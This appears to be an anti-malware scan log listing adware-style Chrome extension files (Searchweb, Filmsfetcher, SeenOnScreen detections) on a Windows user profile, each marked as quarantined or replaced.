PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\newtab\bar.png, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\newtab\blank.css, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\newtab\modal.html, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\newtab\modal.js, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\_metadata\computed_hashes.json, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\_metadata\verified_contents.json, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\background.js, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\content.js, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Searchweb.Generic, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcaidkbhmgafpojklejljicnpnfnaokm\1.1.18.508_0\ga.js, Quarantined, [14751], [554504],1.0.11632
PUP.Optional.Filmsfetcher, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Preferences, Replaced, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\HCEACLBNBPDCOFJCEFKFFOLOBGEALMLF\1.0.15.2_0\MANIFEST.JSON, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\chrome\common.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\chrome\common.js.bak, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\chrome\lifecycle.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\chrome\settings.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\chrome\settings.js.bak, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\chrome\setup.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\chrome\setup.js.bak, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\chrome\utils.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\chrome\utils.js.bak, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\common\abtest.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\common\conf-sys.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\common\conf.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\common\nt_ptr.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\common\prefs-sys.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\common\prefs-sys.js.bak, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\common\prefs.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\common\settings-dev.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\common\udata.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\external\jquery-2.1.1.min.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\external\md5.min.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\external\string.min.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\external\underscore-min.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\search\AutoSuggest.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\search\AutoSuggest.js.bak, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\search\contentscript.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\search\newtab-base.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\search\newtab-msg.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\search\search-engines.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\search\search-engines.js.bak, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\search\search-form.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\search\search-form.js.bak, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\search\search-redirect.js, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\search\search-redirect.js.bak, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\background.html, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\favicon.ico, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\newtab.html, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\content\newtab.html.bak, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\css\newtab.css, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\css\search.css, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\css\search2.css, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\css\styles.css, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\css\white_bg.css, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\external\normalize.css, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\fonts\HelveticaNeue-Thin.otf, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\fonts\neue-bold.woff, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\fonts\neue.woff, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\01d.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\01n.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\02d.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\02n.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\03d.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\03n.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\04d.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\04n.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\09d.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\09n.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\10d.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\10n.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\11d.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\11n.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\13d.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\13n.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\50d.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\weather\50n.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\128.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\16.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\38.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\48.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\close.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\icons\icon_films.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\amazon.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\bg-curtain.jpg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\bg-film1.jpg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\bg-film2.jpg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\bg-popcorn.jpg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\bg-premium.jpg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\bg-theater.jpg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\bing.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\brush.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\clock.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\cloud.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\desk-bg.jpg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\doodle.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\down.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\google.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\hulu.jpg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\imdb.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\just-the-box.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\pointer2.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\TVcomLogoUS.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\yahoo.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\yahoo.svg, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\skin\images\youtube.png, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\_metadata\computed_hashes.json, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.Filmsfetcher, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\hceaclbnbpdcofjcefkffolobgealmlf\1.0.15.2_0\_metadata\verified_contents.json, Quarantined, [4934], [376188],1.0.11632
PUP.Optional.SeenOnScreen, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Preferences, Replaced, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\USERS\RICHARD\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\LJNPOCPPIGLGFCIHJGAPLLPDCJPPJGMO\29.15_0\MANIFEST.JSON, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\common\browseraction.js, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\common\config.js, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\common\utils.js, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\common\winner.js, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\content_script\overlayer.js, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\logo\logo_128x.png, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\logo\logo_16x.png, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\logo\logo_19x.png, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\logo\logo_48x.png, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\newtab\newtab.html, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\revert\index.css, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\revert\index.html, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\revert\index.js, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\settings\common\redirect.js, Quarantined, [4936], [443165],1.0.11632
PUP.Optional.SeenOnScreen, C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljnpocppiglgfcihjgapllpdcjppjgmo\29.15_0\settings\partner\Reporting.js, Quarantined, [4936], [443165],1.0.11632
